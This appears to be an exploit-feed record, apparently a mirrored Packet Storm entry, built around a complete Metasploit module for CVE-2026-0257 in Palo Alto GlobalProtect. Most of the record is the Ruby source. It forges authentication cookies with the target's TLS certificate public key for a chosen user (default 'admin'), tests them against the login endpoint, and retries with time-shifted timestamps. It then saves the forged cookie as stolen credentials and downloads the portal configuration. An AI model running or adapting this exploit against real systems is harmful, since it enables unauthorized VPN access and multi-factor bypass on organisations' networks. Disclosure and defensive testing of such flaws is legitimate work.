{“lastseen”:”2026-06-12T16:32:52″,”description”:”This Metasploit module exploits an authentication bypass vulnerability in Palo Alto Networks PAN-OS GlobalProtect portal and gateway components. The vulnerability stems from CWE-565: Reliance on Cookies without Validation and Integrity Checking. An…”,”published”:”2026-06-12T00:00:00″,”modified”:”2026-06-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Palo Alto GlobalProtect Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:223334″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0257″],”sourceData”:”==================================================================================================================================\\n | # Title : GlobalProtect Authentication Bypass Validation Metasploit Auxiliary Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : System built in component |\\n ==================================================================================================================================\\n \\n [+] Summary : auxiliary module is designed to automate assessment of an alleged authentication bypass vulnerability affecting GlobalProtect deployments. \\n The module integrates certificate collection, authentication workflow testing, result reporting, and artifact storage into a repeatable assessment workflow.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Scanner\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Palo Alto GlobalProtect CVE-2026-0257 Authentication Bypass’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an authentication bypass vulnerability (CVE-2026-0257)\\n in Palo Alto Networks PAN-OS GlobalProtect portal and gateway components.\\n \\n The vulnerability stems from CWE-565: Reliance on Cookies without Validation\\n and Integrity Checking. An unauthenticated remote attacker can forge\\n authentication cookies using the public key extracted from the TLS certificate\\n chain, leading to unauthorized VPN access.\\n \\n Vulnerable configurations require:\\n – GlobalProtect portal or gateway configured\\n – Authentication override cookies enabled\\n – Certificate reuse for cookie encryption\\n \\n Successfully exploited targets allow the attacker to establish unauthorized\\n VPN connections and bypass multi-factor authentication.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-0257’],\\n [‘URL’, ‘https:\/\/security.paloaltonetworks.com\/CVE-2026-0257’],\\n [‘URL’, ‘https:\/\/cisa.gov\/known-exploited-vulnerabilities\/cve-2026-0257’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/cve-2026-0257’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-05-13’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n },\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path for GlobalProtect’, ‘\/’]),\\n OptString.new(‘USERNAME’, [false, ‘Username to forge cookie for’, ‘admin’]),\\n OptString.new(‘DOMAIN’, [false, ‘Domain name (if required)’, ”]),\\n OptString.new(‘CLIENT_IP’, [false, ‘Client IP to spoof’, ‘127.0.0.1’]),\\n OptInt.new(‘TIME_OFFSET’, [false, ‘Time offset in seconds for stale cookie attack’, 0]),\\n OptBool.new(‘TRY_ALL_CERTS’, [true, ‘Try all certificates in chain’, true]),\\n OptBool.new(‘TIME_SHIFT_ATTACK’, [true, ‘Try time-shifted cookie attacks’, true])\\n ])\\n \\n register_advanced_options([\\n OptInt.new(‘TIMEOUT’, [true, ‘HTTP request timeout’, 15]),\\n OptBool.new(‘VERBOSE_RESPONSE’, [false, ‘Show full response on success’, false])\\n ])\\n end\\n \\n def peer\\n \\”#{ssl ? ‘https:\/\/’ : ‘http:\/\/’} #{rhost}:#{rport}\\”\\n end\\n def extract_certificate_chain\\n print_status(\\”Extracting certificate chain from #{peer}\\”)\\n cert_chain = []\\n begin\\n ctx = OpenSSL::SSL::SSLContext.new\\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\\n \\n sock = TCPSocket.new(rhost, rport)\\n ssl_sock = OpenSSL::SSL::SSLSocket.new(sock, ctx)\\n ssl_sock.hostname = rhost\\n ssl_sock.connect\\n \\n certs = ssl_sock.peer_cert_chain\\n if certs\\n certs.each do |cert|\\n cert_chain \\u003c\\u003c cert\\n print_status(\\”Found certificate: #{cert.subject.to_s(OpenSSL::X509::Name::ONELINE)}\\”)\\n end\\n else\\n cert = ssl_sock.peer_cert\\n cert_chain \\u003c\\u003c cert if cert\\n print_status(\\”Found single certificate: #{cert.subject.to_s(OpenSSL::X509::Name::ONELINE)}\\”)\\n end\\n \\n ssl_sock.close\\n sock.close\\n \\n rescue =\\u003e e\\n print_error(\\”Failed to extract certificate chain: #{e.message}\\”)\\n return []\\n end\\n \\n print_good(\\”Extracted #{cert_chain.length} certificate(s)\\”)\\n cert_chain\\n end\\n \\n def forge_auth_cookie(cert, username, domain, client_ip, timestamp = nil)\\n timestamp ||= Time.now.to_i + datastore[‘TIME_OFFSET’]\\n plaintext = \\”#{username};#{domain};;#{timestamp};#{client_ip};\\”\\n vprint_status(\\”Plaintext payload: #{plaintext}\\”)\\n \\n begin\\n public_key = cert.public_key\\n ciphertext = public_key.public_encrypt(plaintext, OpenSSL::PKey::RSA::PKCS1_PADDING)\\n cookie = Rex::Text.encode_base64(ciphertext)\\n \\n print_good(\\”Forged cookie for user: #{username} (timestamp: #{timestamp})\\”)\\n vprint_status(\\”Cookie (first 60 chars): #{cookie[0..60]}…\\”)\\n \\n return cookie\\n \\n rescue =\\u003e e\\n print_error(\\”Failed to forge cookie: #{e.message}\\”)\\n return nil\\n end\\n end\\n \\n def test_cookie(cookie, username, endpoint = ‘\/ssl-vpn\/login.esp’)\\n print_status(\\”Testing cookie against #{endpoint}\\”)\\n \\n post_data = {\\n ‘user’ =\\u003e username,\\n ‘passwd’ =\\u003e ”,\\n ‘portal-userauthcookie’ =\\u003e cookie,\\n ‘direct’ =\\u003e ‘yes’,\\n ‘clientVer’ =\\u003e ‘4100’,\\n ‘prot’ =\\u003e ‘https’,\\n ‘server’ =\\u003e rhost,\\n ‘ok’ =\\u003e ‘Login’,\\n ‘jnlpReady’ =\\u003e ‘jnlpReady’\\n }\\n \\n begin\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, endpoint),\\n ‘vars_post’ =\\u003e post_data,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n )\\n \\n if res\\n vprint_status(\\”HTTP #{res.code}\\”)\\n success_indicators = [\\n ‘Success’, ‘success’, ‘successful’,\\n ‘\\u003cargument\\u003e’, ‘argument’,\\n ‘portal’, ‘Portal’, ‘gateway’, ‘Gateway’,\\n ‘config’, ‘Config’, ‘session’, ‘Session’,\\n ‘authcookie’, ‘set-cookie’, ‘Set-Cookie’\\n ]\\n if res.body\\n success_indicators.each do |indicator|\\n if res.body.include?(indicator) \\u0026\\u0026 !res.body.downcase.include?(‘error’)\\n return true, res\\n end\\n end\\n if res.code == 302 || (res.code == 200 \\u0026\\u0026 res.body.length \\u003e 500)\\n if !res.body.downcase.include?(‘invalid’) \\u0026\\u0026 !res.body.downcase.include?(‘failed’)\\n return true, res\\n end\\n end\\n end\\n \\n return false, res\\n else\\n return false, nil\\n end\\n \\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout =\\u003e e\\n print_error(\\”Connection failed: #{e.message}\\”)\\n return false, nil\\n rescue =\\u003e e\\n print_error(\\”Request failed: #{e.message}\\”)\\n return false, nil\\n end\\n end\\n \\n def extract_gateway_info(response)\\n info = {} \\n if response \\u0026\\u0026 response.body\\n if response.body =~ \/portal[\\”:\\\\s]+([a-zA-Z0-9._-]+)\/i\\n info[‘portal’] = Regexp.last_match(1)\\n end\\n if response.body =~ \/gateway[\\”:\\\\s]+([a-zA-Z0-9._-]+)\/i\\n info[‘gateway’] = Regexp.last_match(1)\\n end\\n if response.body =~ \/(?:gp-auth-cookie|GP-Auth-Cookie)[=:\\\\s]+([a-zA-Z0-9+\/=]+)\/i\\n info[‘auth_cookie’] = Regexp.last_match(1)\\n end\\n end\\n if response \\u0026\\u0026 response.headers\\n if response.headers[‘Set-Cookie’] =~ \/(?:GP-Auth-Cookie|gp-auth-cookie)=([^;]+)\/i\\n info[‘set_cookie’] = Regexp.last_match(1)\\n end\\n end\\n \\n info\\n end\\n def report_credentials(username, cookie, info)\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: username,\\n private_data: cookie,\\n private_type: :nonreplayable_hash,\\n service_name: ‘palo_alto_globalprotect’,\\n workspace_id: myworkspace_id\\n }\\n credential_data[:address] = rhost\\n credential_data[:port] = rport\\n credential_data[:protocol] = ‘tcp’\\n \\n if info[‘gateway’]\\n credential_data[:proof] = \\”Gateway: #{info[‘gateway’]}\\”\\n elsif info[‘portal’]\\n credential_data[:proof] = \\”Portal: #{info[‘portal’]}\\”\\n end\\n \\n credential_core = create_credential(credential_data)\\n \\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\\n workspace_id: myworkspace_id\\n }\\n \\n create_credential_login(login_data)\\n \\n print_good(\\”Credentials stored in database\\”)\\n end\\n \\n def run_host(ip)\\n print_status(\\”Starting exploitation against #{peer}\\”)\\n \\n unless check_host\\n print_error(\\”Target does not appear to be a GlobalProtect portal\\”)\\n return\\n end\\n cert_chain = extract_certificate_chain\\n if cert_chain.empty?\\n print_error(\\”Could not extract any certificates\\”)\\n return\\n end\\n username = datastore[‘USERNAME’]\\n domain = datastore[‘DOMAIN’]\\n client_ip = datastore[‘CLIENT_IP’]\\n \\n print_status(\\”Attempting authentication bypass for user: #{username}\\”)\\n success = false\\n certs_to_try = datastore[‘TRY_ALL_CERTS’] ? cert_chain : [cert_chain.first]\\n \\n certs_to_try.each_with_index do |cert, idx|\\n print_status(\\”Trying certificate #{idx + 1}\/#{certs_to_try.length}\\”)\\n \\n cookie = forge_auth_cookie(cert, username, domain, client_ip)\\n next unless cookie\\n success, response = test_cookie(cookie, username)\\n \\n if success\\n print_good(\\”=\\” * 60)\\n print_good(\\”SUCCESS! Authentication bypass achieved!\\”)\\n print_good(\\”=\\” * 60)\\n print_good(\\”Username: #{username}\\”)\\n print_good(\\”Cookie: #{cookie}\\”)\\n \\n info = extract_gateway_info(response)\\n if info[‘gateway’]\\n print_good(\\”Gateway: #{info[‘gateway’]}\\”)\\n end\\n if info[‘portal’]\\n print_good(\\”Portal: #{info[‘portal’]}\\”)\\n end\\n if info[‘auth_cookie’] || info[‘set_cookie’]\\n print_good(\\”Session cookie obtained: #{info[‘auth_cookie’] || info[‘set_cookie’]}\\”)\\n end\\n if datastore[‘VERBOSE_RESPONSE’] \\u0026\\u0026 response\\n print_status(\\”Response body preview:\\”)\\n print_line(response.body[0..500]) if response.body\\n end\\n loot_path = store_loot(\\n ‘palo_alto_globalprotect_cookie’,\\n ‘text\/plain’,\\n rhost,\\n \\”GP-AUTH-COOKIE=#{cookie}\\\\nUsername=#{username}\\\\nTarget=#{peer}\\\\nCVE-2026-0257\\”,\\n \\”cve-2026-0257_cookie_#{username}.txt\\”,\\n \\”CVE-2026-0257 forged authentication cookie\\”\\n )\\n print_good(\\”Cookie saved to loot: #{loot_path}\\”)\\n report_credentials(username, cookie, info)\\n report_service(\\n host: rhost,\\n port: rport,\\n proto: ‘tcp’,\\n name: ‘palo_alto_globalprotect’,\\n info: \\”Vulnerable to CVE-2026-0257 authentication bypass\\”\\n )\\n get_portal_config(cookie)\\n \\n success = true\\n break\\n else\\n if response\\n vprint_error(\\”Failed with this certificate: HTTP #{response.code}\\”)\\n else\\n vprint_error(\\”Failed with this certificate: No response\\”)\\n end\\n end\\n end\\n if !success \\u0026\\u0026 datastore[‘TIME_SHIFT_ATTACK’]\\n print_status(\\”Attempting time-shifted cookie attacks…\\”)\\n \\n [ -3600, 3600, -7200, 7200, -86400, 86400 ].each do |offset|\\n next if offset == datastore[‘TIME_OFFSET’]\\n print_status(\\”Trying time offset: #{offset} seconds\\”)\\n datastore[‘TIME_OFFSET’] = offset\\n cookie = forge_auth_cookie(cert_chain.first, username, domain, client_ip)\\n next unless cookie\\n success, response = test_cookie(cookie, username)\\n if success\\n print_good(\\”SUCCESS with time offset #{offset} seconds!\\”)\\n print_good(\\”Username: #{username}\\”)\\n print_good(\\”Cookie: #{cookie}\\”)\\n loot_path = store_loot(\\n ‘palo_alto_globalprotect_cookie_timeshift’,\\n ‘text\/plain’,\\n rhost,\\n \\”GP-AUTH-COOKIE=#{cookie}\\\\nUsername=#{username}\\\\nTarget=#{peer}\\\\nTimeOffset=#{offset}\\”,\\n \\”cve-2026-0257_cookie_timeshift_#{offset}.txt\\”,\\n \\”CVE-2026-0257 forged cookie (time offset: #{offset})\\”\\n )\\n print_good(\\”Cookie saved to loot: #{loot_path}\\”)\\n report_credentials(username, cookie, extract_gateway_info(response))\\n success = true\\n break\\n end\\n end\\n end\\n unless success\\n print_error(\\”Exploitation failed. Target may not be vulnerable or authentication override cookies are disabled.\\”)\\n end\\n end\\n def get_portal_config(cookie)\\n print_status(\\”Attempting to retrieve portal configuration…\\”)\\n post_data = {\\n ‘action’ =\\u003e ‘getconfig’,\\n ‘portal-userauthcookie’ =\\u003e cookie,\\n ‘clientVer’ =\\u003e ‘4100’\\n }\\n begin\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/ssl-vpn\/getconfig.esp’),\\n ‘vars_post’ =\\u003e post_data,\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n )\\n if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body\\n vprint_status(\\”Portal config retrieved (#{res.body.length} bytes)\\”)\\n config_path = store_loot(\\n ‘palo_alto_globalprotect_config’,\\n ‘text\/xml’,\\n rhost,\\n res.body,\\n \\”globalprotect_config.xml\\”,\\n \\”GlobalProtect portal configuration\\”\\n ) \\n print_good(\\”Portal configuration saved to: #{config_path}\\”)\\n end\\n rescue =\\u003e e\\n vprint_error(\\”Failed to get portal config: #{e.message}\\”)\\n end\\n end\\n def check_host\\n print_status(\\”Checking if target is a GlobalProtect portal…\\”)\\n endpoints = [‘\/global-protect\/login.esp’, ‘\/ssl-vpn\/login.esp’]\\n endpoints.each do |endpoint|\\n begin\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, endpoint),\\n ‘timeout’ =\\u003e datastore[‘TIMEOUT’]\\n ) \\n if res \\u0026\\u0026 res.code == 200\\n if res.body \\u0026\\u0026 (res.body.include?(‘GlobalProtect’) || res.body.include?(‘global-protect’))\\n print_good(\\”GlobalProtect portal detected at #{endpoint}\\”)\\n return true\\n end\\n end\\n rescue\\n next\\n end\\n end \\n print_error(\\”GlobalProtect portal not detected\\”)\\n false\\n end\\n end\\n \\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223334″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223334\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-12T16:32:52″,”description”:”This Metasploit module exploits an authentication bypass vulnerability in Palo Alto Networks PAN-OS GlobalProtect portal and gateway components. The vulnerability stems from CWE-565: Reliance on…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-62295","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n